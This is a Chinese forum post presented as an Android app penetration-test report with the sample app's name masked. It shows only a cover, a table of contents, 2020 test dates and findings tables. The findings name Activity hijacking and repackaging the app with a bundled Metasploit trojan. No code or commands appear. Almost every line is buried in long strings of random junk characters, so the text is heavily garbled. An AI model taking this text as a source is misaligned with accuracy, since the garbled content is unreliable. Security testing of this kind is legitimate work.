找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4803|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
+ T, V z: z; w3 Y- K6 ?# R * A& k7 w: D( d$ Q

" i0 w( Z. S( s- Z+ I: ~" g7 ?2 Q7 O. T- j% p2 {+ J
L. _, O1 y: v8 m! f ! `1 O/ Q4 L0 T) |' o! w( T

/ H* j) i1 K* d5 [: Y4 S5 U ( j4 q9 R5 y" h7 U1 q
& `# N+ @3 ^7 `7 u' C: p# K . U- v/ b/ C& k

" U) c9 P3 T# ?$ l6 [* |9 A0 R i7 P3 Z- `$ d3 G3 q 文档编号:                6 _7 y2 O! y; W& Y+ `2 B " ?" d- B' b5 W6 F

: t- f/ l. L/ K8 X3 |+ J 8 X$ R8 x1 L8 i/ L- M! `+ y

- O& j1 X. G' {6 T0 z+ _, F- ^3 u- A) x7 }- t {1 P   * n t: y5 v. O7 v 7 m# m, o* K% n% N

$ Z* b* D9 ~9 U6 M, H# m1 t # S& D3 l$ P. P: k& i8 i9 U

. w4 C ?- K# p" c% `- z9 C6 x& f. X 0 F, ~( ~% g& E9 l/ U7 [9 ~   5 O4 A, D) t" ^8 n; v" _" j+ K. o 8 q. h& t% K6 S, f

. ^, ~! t5 K, q1 h1 n# k& J" N7 J $ P4 m+ H* k+ w1 z+ J6 m

+ w A+ m8 x, U/ V* h* t1 A , \9 o" H( ]8 D1 o; ^7 |0 [   6 B9 O# q( x9 V5 F: N# @% e$ |( r1 j; W4 b. ?3 ~! ]5 ~/ w

3 S& N( ~% n3 M; z) G0 o- v & o( k7 p6 e# `& g0 i

% O- C" N ?& ^+ \ : }, m) y7 c ]5 p   2 Q( b$ e# \1 E/ Y! C8 s' k' t4 f( @' s4 C' g8 c

( ~, S2 {4 e1 u # ?0 e4 V( V8 K& }* m/ E& s" z

; L) s$ N% {9 Y8 D 3 l" ]9 ?, M& Q) j/ ~' s* F& A! P   * s" W7 m* x) } $ _! g* m4 W8 }' ]8 x7 o

8 A. V" ~6 R) \9 a ( A( Q! \9 ~( {7 P

: |# v+ G4 B- ^6 b3 c , Q8 D' u4 e- o/ P 某某某APP渗透测试 7 o( |/ }* j7 z' G/ N( G * e4 y, i7 _; R0 {6 b

8 ~ D( w3 v! a* n; g4 x! w( U 5 |. |) c) p% L/ M

- S R5 g8 W- Q# p% ? . g; L* k' t" k2 ~ e/ A% ?   ( ]5 d! B& R1 }; S I5 _6 G& [ 2 y/ N5 m$ V3 A7 b& M- Z

8 N4 m" L' L- d1 W% A( i) ]+ P7 o$ Z) h% ~0 N

7 P" Z/ b2 W1 w 3 e: ]; W/ I1 \0 r3 b7 x6 a   # O% v( c( J8 U- y* X$ @6 T3 S$ `* l/ P' w% b) ?

/ Y h! c ]# b5 q8 ~- B8 ~' h! M: r

1 }+ r+ y# ?0 P3 x5 k$ A 6 P4 J6 f) O* q, d6 U- @' ^   ! p& s8 z& F! w. _+ v , Y7 |' q1 t8 ?

! J- u+ b7 f/ y/ l " b/ _8 j! I- u( D* [

5 g" [9 M! F8 Q, q8 y w7 O. }: J M8 [$ m) k4 E0 d   . N, H* L- z/ k1 j9 u' S% h3 j) M1 j9 ? B( g! X; n- M2 t

# W1 b& d) v H9 u+ ^$ ?. W 2 c$ s1 y- ?; n, [3 l

8 Q9 N9 m# L% m" O- D* m) h. U" R9 |9 p/ ]: g, B 技 术 报 告 ' o b2 r% E- n0 }- k/ \" u9 j 1 \% _9 t8 i# c* V

3 t+ P& S( L( X' p # D& a# E1 f; d c5 k

* v1 t5 S0 c) q+ E |* t+ o: R9 c$ j2 c, H2 \   - w3 Q4 e, E; M) X3 N- k. X0 L 9 X2 G( U R1 h4 F

7 {; P8 z! {8 \& [, @3 v 3 k2 R5 R5 y7 n. \% n* U

- k4 `% ^! _, ?$ B+ c# w8 G) ` d4 ? A" T E4 a+ {   6 w4 ]2 ^( z. c9 i1 C ; p) e2 m. B# v: i$ ?- u. H

. r! {9 Y& e/ \/ a ! Y/ @ t7 c8 V

' t8 C" H, s1 l' t; h+ ~ 3 @4 z! k# o# q0 V/ w   # {4 J d& t* r9 ^! f( a) O1 i/ L/ Y1 M- A0 O! \

3 f/ T/ U5 y! J) l6 { " F9 ?) F. q# C3 T1 W6 d* C; G

6 M' x, }# m+ O4 D$ ~! \- U 3 d d, z/ g6 P0 p% u0 f, j   $ v1 G3 c9 a; U+ K/ A; S7 |1 X4 v& [% M# H

9 ~: z I" C i / N0 x) V% P3 D* k. u7 k3 x! Q4 s

5 J- z! L* G- Y$ u: Z' K 2 _( U! i. Y5 {; y   8 _! w2 o+ g K& N ( x* H7 h0 k( c4 t

) t% ?% g+ [) n$ \" m 6 k( i0 J' P& p! M* R4 U, S

/ A/ y% c1 s: E& y* Q/ B; N/ O2 ]/ \4 I4 m. {, c) k* T* }* C   ~% ^; W& P7 J ( F# [ g7 n/ s3 z7 j! W6 j0 `* ]" f

- g% L0 m% Z. o8 V8 a % k9 q# B! i( w* d

: ?, V4 H7 ^; i9 a; C- ` 0 C. a/ b7 j+ k: q2 G @( |. r# \   7 i8 s! h7 Y$ {' Y. a2 d; P9 f' }2 {6 c5 b" v

+ g- i; H! @8 B3 c % I/ {$ {' W/ |) o0 F4 ]

& N" m# c) n7 J# `4 h9 n6 O$ `0 D8 P & ^+ l! D: G* g5 }6 J) `4 q# d# [   & Y6 }$ n2 [) R; ~ 6 e1 @: ?4 I; u I! o3 x* l6 ]% y! `' ]

) t' H" @4 B. ?6 i; M, } & n3 D/ I" E, }# N$ H# O

/ g! o9 [# l8 E; g6 o- M ( _4 S( ^ C2 Q; g7 r& Y! ]   0 B+ ^& f: A1 o$ |$ u2 x- { 4 }' Z, c! ~3 B, Z

1 V+ z1 n& U7 n u4 y. R8 t& S* Z* g9 U" u- G# \

4 ?+ @0 _8 ~4 l' `3 V+ J8 n5 }* V: o 3 w! f5 m0 p+ k w7 i: J   * H1 I' V+ l! f$ t3 J* }6 ?5 c" L1 I/ e& H& i; `, ?! ^) h. J: y4 G

1 N% t- U( D, i# E S& r+ h7 |7 ?5 R8 ~' P

( ~0 P2 ~1 K' n4 s% ^ " L( d! @3 X- |6 M0 `   D* W" e$ j1 _4 Z 6 @ V% B- r7 P# V3 n% [

m6 d/ g# Q6 |- @( b. n- E& l+ ?' }# v: I9 M

$ B% Y! B, p) b+ _7 X: Z' C, E3 @$ t" f u! o9 [7 z   m5 B1 u0 C4 `0 c: {, R4 Z ^% y& m; K- W5 X" f z; G: x& m2 Z s

2 @+ i2 U5 t* m7 ]4 @& u; q5 i' z# x

6 J- m$ `5 ?/ u1 q: x3 Q, X$ P" r/ \+ N, d   ) a+ [1 I+ F; }- A. Q& z $ e, \1 a8 q0 ~& D6 h, ~5 h2 [

- F3 ^3 P+ @; g5 ?) y3 v3 u' o/ }5 g6 z' Y4 v% [ e3 N. n& E: r( E

' g7 C& m; T" Y v 6 F, m8 N$ z" Z1 x! e8 B   & s7 b5 n( h. _) A: o- G2 Q0 U0 J. Q! w7 e1 @ k

( k. b3 W# s5 P7 j/ q! @' e& ]8 q$ u! t, \/ C

) Q7 X6 G. b5 |8 \. W1 ~ 0 f1 n4 @, h J; H @$ b) Q   / N! L h6 @, S6 q3 S7 H3 f# S' w. u' x" P8 s5 W) w

7 V( w1 R- j- p2 [) r4 U6 e4 f- N ( p: Z& V- n7 ]. C6 Y

$ ]/ J5 M5 t: R1 c8 t; u6 G ( W: A- ^& a1 g& X8 K" K   0 _+ d; O/ h( `. [+ d. l6 c* u# c3 L) I$ G5 @( d

0 f1 b# \9 q9 g: I 2 @+ ^- E6 _! s4 |6 x/ \" `

0 ^6 {. `$ t5 V9 _$ Y& ?- c4 ~ # O6 B1 J% z! G7 B+ V+ y+ M: [   0 c/ n$ n9 D7 K 4 P# V9 I6 [! `4 Z

0 z+ I, R* \, c: m" Z) H# I: M! o9 {& k8 }3 N3 E. I T, T- e

6 v/ @- @/ X" g+ | m4 f 4 m. Y) a# O0 v. g3 F S6 j   $ I, Q4 `+ O! ?9 V . L+ n- }$ X9 b G4 \1 d2 @4 z

. Y3 ]! g! K$ ^+ I I$ D# n% N9 b6 e( K1 d7 I, M5 H& D

/ B$ \' J) g& h) }/ [( q7 M' A2 \! _8 S3 R" U 二〇二〇年 3 U% m: ~- ?) a* J4 u1 z3 T5 r7 q. c7 z8 |4 Y7 @% ~8 }0 F. B

" S, P; e3 H9 }! @* T : N9 Q. z# V& T5 e
2 m2 e+ @2 b1 N. D/ W6 { 5 A, p+ K5 M$ X. m- \" p( ^5 E
& c- K& |8 X$ F& e5 M5 z4 L0 R: j/ W7 e9 _
3 U! T- K; w/ [8 o( T2 c 0 i' O! l% l+ g% L. D8 N
2 P; b" s3 _0 z' u( |! X9 W1 C. G: ?3 c' c
$ z- ^% X, x/ [' r' D1 |% C" T1 J! n
! P& k8 R d" A+ e# g" t/ m 9 S' K8 i: U# q* h! p6 t( ~; d$ k6 t
7 ?/ g$ {; m9 H+ K, S4 E( q G8 ?( D4 \6 o
& T- _/ t- |1 ~6 {* m/ O( G , |- R# P" o& K+ @0 T

7 W' i# K2 x) h9 o . I+ }" J/ Q3 O- m$ s 目 录 ' o' S/ Q% y! m2 t3 |" H- y3 N % [; u$ \1 b% A# b( i$ A8 g) y

- C& F* p0 u* h $ R7 a! `) \7 Z+ y9 Y' t8 V) d6 H ( w2 K* Q# p5 B$ R 7 J3 e) u* C% p3 E% W0 L( g

! `# X$ M& f: o 0 U) }" S* t6 I8 G! E( K" Z   3 [; ~6 o2 R; ~- ^ ( s: W/ d1 q Y" Y; |, _) k- ^* v

1 z" ^6 {' m* N: b/ i" \* \/ @3 W/ o* ]9 |! Z) ]/ x" d6 R

3 I5 Z, W9 ] O; f! z 2 x) b$ ]$ U" s7 U4 c0 M 1 概述... 3 - z$ Q- T5 D( p# B, q) y * F) d( C0 R3 {+ b, `9 Y4 c2 i

5 x) ?+ O5 @ [9 }6 A" m+ M' h( ]/ L9 b

5 R5 w' Y& P! a6 |- _, q ( p' r2 ~: M' u 1.2测试时间... 3 4 u3 h" n" Y% Z4 X6 i0 G8 \ ( ` n2 R1 t t: I* u3 V% l- _0 e

8 U+ A2 u$ o! f4 N" }' u$ I l- v3 W* N7 O8 p+ P+ p

- ^4 Z( l8 w9 t 0 l; k9 E9 c! }) y" N2 _5 ` 1.3测试对象... 3 0 M& F4 t8 x3 |& K7 y - B- a6 h M8 D

: a. u3 n% |- Y3 L J% c; h# ~. |: u; W% M( n1 J

+ K! B1 [) d! a - E+ W5 z2 T1 n 1.4测试结果... 3 1 t5 K# d6 N5 ]9 O& ]: G5 i- l

/ r2 C5 e& S. x+ {( x* i " m1 `3 b |4 s) k4 V! G

8 e2 F3 ^/ C" ?6 }# ]: m2 | ( k" E+ v& }& ]7 Y$ }( B8 b9 t 2 检测结果... 4 + Y; I# D, o# t - G" T( H7 T5 U- C% _

1 @# y# I8 O- J- v4 p* m; c% c5 O" W

" H4 {+ N8 Y: w9 G 4 b! g* f. s; S: I( i% I 2.1 某某某... 4 . ]' r9 s' ^* d) Q# y# X b; Y + ?; b; a; t3 M$ M

: S: w+ n" L3 ]) _( Q* k7 l9 I8 f8 |

. M" p9 j2 x7 W. l9 j" R0 U+ H5 C * n- F" y3 |" J t2 L& v 2.1.1检测目标... 4 " ~( C! H6 b1 }# O- c9 v2 R! y* @5 \ ! _. x$ |* F: Q/ A" A/ M* ]

! W+ x$ ]$ p' C+ ~/ R; R, M 8 J# m2 H! K& \% t

' Y- j/ H: Y# o% O 2 ~$ X# u+ C8 w2 m! [3 K 2.1.2检测结果... 4 ; a, k' J- ~2 Z0 v$ b ! @! a; N- l' c$ Q4 N+ d. N0 \

; U9 A# l; w1 q2 U; k 3 E# {$ d) F5 y: N

$ s* k9 V7 K! a M0 [8 I' ^7 b 7 |; Y# @4 F+ Q7 b; v 2.1.2.1. 4 " F; M3 C+ b/ P( ]5 n5 `. @' _ : I$ v6 S9 O; k, l

q. D0 f+ y* G4 f C* w: ` - h; Q0 T2 q( G3 ]# U: C; w

* T0 g: R- ~& ~* `% t% P" }# L. l # T' @$ w, b% p" B/ c7 C' { 2.1.2.2. 6 1 L7 q. G) W) P! r4 @. ^ + k2 Q+ y4 V8 T6 Q" G0 R2 _

$ { l* `# U6 e/ x v. L) O( o9 F9 |* L) `9 f$ h

' ^7 z2 c9 j/ d5 Q. R- q) L/ R4 a1 N6 } k5 R + n: ?. I1 q* Q( G2 t$ I6 Y' F ) h; L0 S) r. u) f0 l6 K

& ?: w- K4 k4 `6 I$ Z3 D6 D7 V # C7 \# k6 Q. T1 Q% ]0 J) H0 K4 j. {# \
! X2 G/ r$ W9 p" H " S% |$ |' I) y# H+ F6 J
9 g1 F. j/ Q; f6 B3 J. e3 I 7 m9 ]4 Y) U* [& k6 _) B$ }# a
" E2 ^: }/ C6 O0 q! |0 M+ V9 Y* W: M5 _. s' R) l
6 }5 r. z* w- {, [- S 9 p+ B: y$ \8 q% |) |4 s& G! e5 g

0 r# e& x0 A2 P; D8 Q; @, u 8 W& R$ L# C' F9 R 1 概述 6 R! B; D. G, D5 O. M* O. ]4 M9 y4 b4 m# N

( N& U; U' F6 k5 @8 R4 p# u+ Q7 b5 F7 u/ D

5 z* s' |/ c& [% e3 x( | ( \; k2 H* g+ z* G1 b/ S 1.2测试时间 " |% f2 d6 a* r8 Z V8 g" K0 ~, `. [ , k9 i8 c3 z6 n( m

0 e Z, r. C7 Z% {( C4 j3 R* s . D M0 g( N* y1 c . s' }# J3 M) L4 m- i# u& a, p% L1 L& v* g7 F7 v6 ~8 ~0 ` J* l3 ?2 {9 L2 A) V! Y& a- q/ _4 Z! [- ?5 g. P4 k0 a; }/ S' c0 _, X& t* x5 @: n0 |5 n7 @, \2 U# M. A- J' x6 ~% _9 c4 \, A& g* Z- Q! t0 _( m3 R7 x) p$ c$ Z+ L v! V3 ?4 g- T, n# \" K5 w' V f' L& }: w6 z3 r( g, }9 D/ ^( v4 \( H0 N5 ]: w7 l' |6 S! y! n' E+ \* }5 v1 w" b/ }0 a9 d8 w7 j( y" U0 W* \9 }2 A( J6 c2 ?1 | F) _* P. D, H* [. e t( r& C( {( J! ]* ^2 ^! E+ Q& y5 p5 _! B7 n4 ~5 u, q3 d# ~: |: h+ Q% m/ C6 x" W" X& \/ |" D# A$ A# f- _9 G# w/ {' T+ f0 Z5 V; x `6 ]: z2 r0 K j$ \! T y5 l" p4 S3 y0 p/ X2 L! o4 l+ J0 x8 r4 B& |3 I# l0 r3 J8 [# f; l9 B3 ^4 a0 e& c# G/ G5 U; k) Y+ T1 W
. Q1 y8 F H( T, [$ v h; b3 m0 I/ S+ S/ ^

) z l9 W! {& K1 F ] ) J- b* b7 E" [0 ?* f7 q 渗透测试时间 4 e6 n" ^+ t/ b' P; ^ w! u2 U: Z

0 R3 [0 C, ]) B) f3 o4 p: ^. [ # F6 V' t; }6 y% d/ d+ E2 j/ y
. Z5 S0 t+ v/ K1 {% G! } $ i* n% H2 p }9 Y

, \- A5 P5 ^, q- }2 L. Z4 G 6 L) c5 b" `5 X6 c+ V! G 起始时间 5 N! F) d; m" L2 Z% q7 H) D. ] $ G9 f/ `% W+ e& K

' }3 h' r: Q( B2 T: R ! S2 Z8 g1 l) S' A) J
- v1 B( h. e l0 a# ?8 Z& W; V) }: C : U2 J3 B# c2 ^) b5 n

/ R" v! b1 {8 y0 r+ ]3 y " A! B+ I. d* N4 c 202046 . ]3 \, A* ^% z, ~- ?& W 0 |! e! f+ T9 K) p) w

) X9 O% v- D6 I; a4 T- v " R7 o% O/ M. ~
1 |" \& \% F6 N# n, v) j1 U : o" f: D, B. E3 w6 K4 |

0 E, a t4 ?3 n7 ] " U! K* R7 N1 }. ^( b5 L( N 结束时间 * Q/ P$ k4 q3 ?& O, p; l - J0 W5 L* V7 U/ z. v- H

& ~- d2 w4 s0 N5 \8 K x% K$ d" ~: T. q- G" t! {; K/ X
; b2 l8 ]6 ?8 z* Q3 v5 }4 h/ o5 J2 s1 B; B2 C( F& A

@# |& O5 T& b, z+ T; ? A5 \2 i$ P9 ] 202049 ' }0 m" e, z1 [ T } / [5 m( p$ ]7 s* h) C, T. V# { B; O

' }/ d0 W6 R& |4 i7 Y1 a8 S2 F# [, C8 E# n! F: ]4 l- X
7 F% |( \) Y3 l8 f7 Q1 H & \1 k. J$ \ n0 k& G+ O( w! R

1 b8 c' h( m+ z" i& p x8 M) f" c3 q0 s+ j7 w 1.3测试对象 : g4 g0 y3 x h. x * X- e2 [$ n! ?! r9 |

' o+ K# y! n, g 4 q4 b6 e( F. E0 W3 g I/ c5 a1 Z

( P8 J) X x. f) c 4 s% t2 }3 V$ Q/ x5 s# X 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 6 _( v! N8 \: l8 r2 v# C" S* X & `( W% ] _0 ~- u0 u* ~

- j2 Y- u' O U, e1 R N; H+ U 4 ]) R5 s( d% U: m5 ?6 N

4 N) `" a* O) @# V6 Q7 N3 S( B% b+ J2 T# @0 ^$ a1 k4 u 1-1 检测对象 $ \. Y- c; I$ o* k$ A d , c0 |" V" y/ {, d1 k6 y! F

5 V0 M* @# n) S/ e5 M 7 w' |# L6 J* J3 t* C ( Z5 y$ Q) X! D$ P+ @9 `' h; e9 v" f: q, K) W t; r. b8 d. _, L$ ]- A) D+ }1 ~3 D$ n l# ?9 T* x6 f3 g2 w+ y( X& ^( K5 J- v/ M# D- O% ]1 B! a4 v# x" L: l0 I' b* J! z5 M6 j8 A: c! j% N' i6 w4 T; i, m2 W& l I+ [5 b. W1 ?+ E( ^! D0 y! N( a8 w: Z7 P8 S2 M/ @& ?* R8 @8 t* `6 h& n* _% ~4 r) V! l: m1 D" }* Y) W+ b- s% r, a3 _ U2 U+ q3 q$ l/ N: ]/ |1 ]0 Y. v0 e. P$ s0 ?6 B# T/ ^* H+ a0 L6 h& S7 }: f3 d! C0 `2 E5 K, \+ Q/ n+ U m: c" W! m! h0 a& i9 u5 P& D! G4 j: i8 O9 `3 I+ @& l& R; S% ~' p2 [$ y2 m8 r! ?% a" J" O9 W T( I' `0 S2 h& p$ V) R: I; L1 [7 t$ k! O! c0 v5 g! K! ^# `4 a8 Y' h' F0 M% `/ p$ O% y' w9 j7 B4 a# H. f4 b; a$ v( C" ]# ^. S8 G3 C6 ?; v: g. m! ]9 E# F+ t3 F `* p' t* ]. ]/ l+ [) \
1 R; y, ?# B. u1 ?3 ^3 F5 i, W, d% z& a4 c& i

# h' {+ {1 b' V/ L 7 |$ f' h; k1 Z2 B1 _ 序号 * }2 w& {$ t3 c; i6 S2 Y" l 5 B) y! B! X+ u4 E* Z

1 `9 Y3 T5 [5 t- O1 H 7 m+ T) z5 B5 C/ \ l
/ `( E6 L8 e$ F7 ~9 w. ] . t9 X0 x- [! u. k* Y8 @/ W

0 f0 o9 ]# v% t( I* ~- K1 V- i4 k6 T% o+ w1 X3 I9 _' J( G2 ^3 @, P 测试对象 * k+ x2 S2 B" s. y4 P, ?4 b0 a: f 7 U2 G7 p' @/ ^' W1 Z

8 q' [4 C4 ?0 y, g" t0 o9 K6 C) F9 Z
4 k7 r" `0 v5 [3 _3 }& R# z; i0 |8 P$ T& y) Z; t

0 G1 K: n5 i7 k6 J. Q% S* @- E% H # o5 J6 ^! Q2 k% j: {$ B; k* K3 V 测试地址 + H/ M4 S% w& P; P' K6 ]& H1 V, Z , j: {9 F/ r Q0 f; ]

2 }- p8 N9 @- [/ ~( O8 n* X: `7 R ( ^$ F% X7 A3 ^7 @
* C0 k3 v& W- v' r5 b4 X% X F [& \, ]; C+ s5 g

8 Q& A# ^1 X8 G/ f8 @" d : \$ F6 m4 l2 I& j+ l2 m 安全漏洞 3 `4 c1 @1 g0 L R4 I# h9 R' ~1 A9 O! z* [1 v; a

" s$ D* o; v- s/ \: E. ^( f# _0 R3 X9 m ' C7 O, E: O& a
8 u: Y2 q% O; i5 p- G& j& b ; U! r7 o4 B4 n+ r5 d5 W

* O2 p" b: a+ ?6 T' T6 ^ 5 z- X! E& |. _/ s( e 1 ; w2 t" l9 x: W0 L/ u# t7 z& S; ?, B x9 i# O ]9 U9 q4 m

; L8 z5 }( {, G; A # r1 {4 M) ^4 m% r
& J* j1 U+ `2 s+ f# C# K, ^ # {! j& R; A" t) r

2 T3 N% C' c8 S9 J. D( O 8 ?) e& ?& `7 u$ o5 f; A' c 某某某安卓APP & P! Y$ K- s# i O+ C$ Q6 N, X7 @! ~% V- b

0 { C: ]8 G @: Y " g3 i7 {+ B& S
2 V+ z9 }+ I& V3 F 7 r$ R _- S0 a! ?

% a' k1 T9 M% A' H 5 U/ U# w" L8 I   ! W! @" n/ t' ^* ~8 F @; d+ t5 [! ] t4 \

# a0 {8 R# o! ~ & M/ z( `7 p& Y8 Z; @
. C1 D3 i! F% o; y5 l 1 ]. u" b7 O3 V/ U2 o

$ c T. k+ Q& t: M' y) n* s# Q # r$ h J* z( W4 J- W7 ^; J 2 2 h0 e: a2 ?0 w! W * h9 d; ~: L+ @. L4 M

) Y- w' C# k! G8 l$ }; M7 e* O ! p a4 l; o8 U9 w
* T1 _7 X/ Q5 o5 u 4 _. x C o3 M& M: v

$ b7 K" `* F# Z& Y* M" C6 z# b. F- E3 K' D! Z6 g' O/ b$ E. P' k4 } 1.4测试结果 ( V8 y" {9 X, t s3 ~ 0 k6 q( S% I$ V

; q0 f' A! D9 Y" d. U. m , m" x: r* N. W5 H& x/ i

* R) y% `% N8 }1 {: J8 X l) w, n 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 6 e9 C0 J! o3 N ; t4 W8 F) n& H6 F {8 c+ i

4 p! N# o+ g( |( \/ O2 [. w2 j 1 k. G8 y- W- }: U7 u

) |8 U" Q4 b( Y; p" | f1 g; Q- D' _: R+ W/ g8 t   v9 }4 ^9 m; V) ?1 j: _' f# o 5 Y- D& A& b/ a

/ g7 t. B. i' w8 E+ s' E! s! h % U; N+ f% P. o' j- e; u
* K. z( Z7 T& q5 |' ^. {3 R" ?' U# n0 s ' U& i2 l, H! F# b1 ^: Q% i" d# M+ a8 r# v) y4 Y/ L# z" J, t0 T" {9 d* ~; ? k* Z; A% ?+ X4 ]$ R6 V4 _9 a5 c% R* D4 s# E( J& \+ j, |# M! P% w" ~) I/ y- a. j# W5 v- `2 [- s5 G0 N; G: A, K) X3 G( w# s, u% F0 L8 n0 ~7 E2 }: [' o( E# Z0 c6 U" L6 x( Q( ]" m8 s5 \, Z+ g1 n, a+ V& ~( ?. O; x7 f+ y, D/ W9 e1 I# {9 @% b$ \+ S& @( F; m3 M- u' ]! r- ?2 r0 T+ u8 r6 T& Z. {3 U1 w1 J d# i7 S; v r7 Z4 z7 z7 M* b. G* Q+ C2 q# M: M1 X0 U3 ?1 d. z* y# ~+ L5 X' n, Y- ? P C( g3 F- p& t" x$ T# V0 F3 @# O- `% y' r. x% t8 @; b" a# L; @* I/ d9 ~: E' I5 e& p# o. v# ? ?+ F0 W, V) ^+ q. p; W" o9 y' g' T( Z+ a; N) I; M- Y* F$ v' m. F) D$ I2 t5 O. u6 r* _. H2 D0 i2 s5 q p" X" o9 w+ F4 S2 M/ | q, K: N9 o' k- p, A! A1 g% z3 `+ j9 Q2 g5 ~8 h3 C5 D- |$ U8 o0 @' w( f" z5 P- `) h2 V0 V" B4 f6 v. \/ [* P( P2 n- W. {, ]0 b0 s# |/ Q# K, x5 S) o \5 Z" s: |8 g7 x8 t! s$ l8 c3 \) v& {- m8 X ~" b" b+ s4 ?, {( j! z- V8 _/ I6 V2 _* g( x4 ]6 ?; o, g: w, B. V6 T, _9 W/ }' A* f! M; V% M) A/ q# y* _+ ^$ j6 ~; R( O8 n. k7 {5 t, q% S2 D z3 V) N& z; _7 q! c. v' \, I# }$ e: G7 y8 @; m- t2 O! _. _5 O1 _2 M$ @! z8 l( ~: W, l( i7 T- v- g: H8 q0 w& I8 N2 m. W& |# B1 y5 L" I0 K
0 j( Z6 ^7 L' w% e$ ` / w1 V9 u# C5 v

4 Q" D4 ]2 d/ d( f- T6 B. i0 Z) o* Z; R; R1 W9 T# g1 s! t 序号 & ], Y J/ O1 X6 K0 i ^9 | " _* ?, P G- Z- a8 _9 Q

$ ?: U4 s: ]' p( A / L' ~5 w6 `" c: G
3 _4 `0 H4 V( A2 u: z, n5 t & |4 h) b: c0 F l D0 ]

: x% m5 v3 q1 T0 @4 a0 l; w; C ) L; ^# |6 K( J/ j& ^4 ? 系统名称 + Y6 l1 U7 E' } $ m& m( e" f# Q7 K. {7 o, b1 ~( Y( p

6 V* ] {( H8 p. v' b, ?$ W ) F/ p5 x$ {( o# q, _7 X) M
: @0 l) _" V A& P) }! u 2 a( F* e; P4 g

+ s* D. l( b! h5 c8 r. j - l4 E4 c; d a 漏洞名称 9 @- f# _9 h/ Q) a, q 7 R: ?) n7 S+ H+ @" p

( B0 g8 v4 S; H$ { T1 C" c+ x: s 4 R# @) C5 `; h: \0 o
/ N% \0 a! z' b7 h; s/ M2 J 7 ?2 P; K2 W' T, T

+ U7 Q: [9 f S# ]; T' A " N- _. U9 x8 P4 Y 漏洞危害 % Y" p8 ~2 ^( e- ~8 V8 ~ @) T9 G! `8 R7 {) }; T

- C( i" y, F0 P# \, n( n5 v6 ?& D0 t b( r& m+ V6 {
0 S/ }4 r' w- q3 p0 R' m2 e 2 p& ~4 C) I3 s5 `2 \+ ^# Y

9 j% ]: z# C3 W& q8 v! s + I& O% J" k/ a. s; L: u 修复结果 3 `, C1 E! d, p- D z+ Y% C + I7 l" Y5 k" B

1 L3 C: I1 I+ A! |( s # z+ _# w2 I6 G5 W8 Z/ F; w9 Q
g3 I5 h8 u; K k/ A V f/ Q8 N9 L7 D6 K" u- h

5 W( `0 M' i& u) w# r, c2 E ! w$ ]: k y' m9 G! y5 `6 H 1 " c6 D/ O$ ?! Z9 P2 o( V& y* M, x5 R* |# |6 N# w% M

4 {& X' q' i& d# P2 M1 T ' t$ R6 o) \9 b3 C8 R% B- L
! h( J. T% E& c- o: b& X/ a, z& y + k! s0 o+ `1 A& T* ?

/ p9 ^3 W: n; P0 X6 M' I- ~+ g/ ^. S5 }" C 某某某某某某APP % y2 J/ L6 } i/ s* c: h; J # I: @$ i, U. g; L8 @/ y }

: `: g# e8 o* b* @( r 2 N! \ W" u$ C' I) X; u; l: C1 O
3 G9 H" A: S3 a: Z& `* d8 l/ u/ m* Q: M. m; H, ]

6 g. D+ N! \% x5 g2 C- K, F9 X5 U: f, u* w Activity 劫持 4 r, I: _5 I4 m; I& ?0 @ 9 l: J' Q7 w L1 \# z$ f. h

! {& Y0 G# R4 S' Q' U" M+ y - }( \9 K! @2 @ H

- q% U! k1 P ^# v8 [ " _, n: [3 l& K3 e7 g) I# {   2 _5 \# j9 L& @1 K/ ~& q/ K e $ ]/ m3 @6 B; Z6 \( u F+ Q

8 H" [9 T) V1 M9 `/ x& V2 l 0 s0 V1 W" W# j
- y* {3 G" ?; b, y9 ^6 y/ F 2 S; }" T. A. {! ~

/ Z# u: q+ U4 V1 y/ J2 k% M; j& M 1 R, |. { P! p3 [ 6 v9 J7 k! H. x / A" b6 r1 ]8 E+ Z8 K

) e: ]4 Q5 d: [8 V& j4 D2 ^' } $ f6 ^; ?. W$ k5 z5 [7 T! M
0 A- T+ ]) \1 R1 Q" z% [6 T& j ; ]* x& z/ T% f9 ~

( s U' W; ]1 {! i! C# l* M E" V! Q; `! V3 D0 o% q" E4 L6 `   4 B- {; o; `, P1 K- } 9 E. I; S: V# y. k% P! N

; A, J! y0 V3 r' E6 v% N% F% J6 T( F- g5 |& P& V0 `4 f( x
" m8 n1 U* o; L$ L/ @ ! r% C4 o# b* W! e0 d% V# i& E. g3 g# u

. c! P4 a( d* J . B- A5 Y4 v! _0 q" |2 y7 ^: t 2 ; s+ u2 h* B. h) \ B : z# P9 x1 ~+ P8 o8 o

" |7 p3 ~; Z( z5 Q3 q1 e7 x ; U7 b, l s4 Q- [: s% T
) n% k( P9 m6 Y3 w. V , F! V+ G) K) V" l; j4 C: b

$ A! B- ^4 X9 j# V4 ?5 N* | ! P4 N; J/ v: G F) g% N3 M 某某某某某某APP & H* Z' u2 `" X. n o 0 C& M/ \" X/ i& j/ d

! E q8 _6 P. Y \5 |) x- r' ^! @6 n2 c
9 Q$ o0 H9 {1 ~0 t, b 2 w d# M4 f( X; m

F, m/ a/ s5 b ]* a m& A. B' C * m8 {8 j# o, Y G 反编译二次打包捆绑木马、篡改APP代码 ( v6 ^( Y7 N2 j* d, A( a w& N& {2 v/ d7 [8 s

A" Z( I& s! `5 ~ 4 v* G8 {5 H9 g4 w
/ h( Z) o Y! `$ @$ N% y. M6 C2 g/ O* i0 B

+ x9 j0 o" l5 F7 ], N0 r e: B' r' D& e* T/ [+ P , t" O( c0 ^" a4 d0 s' d 8 ?6 F" j" I0 y) \/ v) N

5 q6 I! Z1 Q+ b9 H4 M! K ( @' n3 C$ _# X3 ]
0 ]9 A3 C& v/ `$ [4 g 9 D, _5 _& i7 ^" O7 w% {* A

! h" R& `& P* h; }- h: z$ h# y- s : d% h- F% y6 x, x! c; Z   $ i# H$ S: _+ H/ S% u& T7 o8 J! ], Z3 M; a: O

6 \7 ~8 m& G; |3 z6 [ 7 e9 k: Q1 D5 b4 X
% ?7 b: u; u+ m* g$ Q 9 T/ ? F# A/ Y. m9 {6 r+ v2 q; l
/ `. [6 u% F2 V7 i . F: T1 P: K, D1 R& U6 W" o4 V

